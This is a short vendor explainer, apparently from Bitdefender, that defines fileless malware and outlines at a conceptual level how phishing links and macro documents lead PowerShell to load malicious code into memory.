What is fileless attack?
Fileless malware attacks are also referred to as fileless attacks. They are sometimes also referred to as non-malware attacks, although the term
is not technically accurate.
Unlike file-based attacks, fileless malware attacks do not download malicious files or write content to disk. Attackers exploit application
vulnerabilities to inject code directly into the memory space of an existing application. They can also leverage trusted office applications or
administration tools native to Windows OS, such as PowerShell or Windows Management Instrumentation (WMI), to run scripts and load
malicious code directly into memory. Like all attacks, the goal is to gain control of computers to achieve the attacker’s goal, such as destruction,
distortion (ransomware), data/credential theft, or additional attacks.
How to Stop Fileless Attacks at Pre-execution
At Bitdefender, we challenge ourselves to protect our customers against the full spectrum of threats: file-based and fileless malware.
As in the example illustrated above, a phishing email containing a link takes the user to an exploit-hosting site. The browser exploit triggers
PowerShell running command line (script), then PowerShell follows the instructions to download additional script (typically a larger command
line) from a remote site. The larger command line contains fileless malware that is assembled and run directly in memory.
In a second example, a user may receive a phishing email with a .doc attachment containing a macro. If the user enables the macro, essentially
a VBA script, it triggers the PowerShell script that downloads additional scripts containing fileless malware code from a remote location. It then
injects that malicious code into the memory space of a vulnerable application.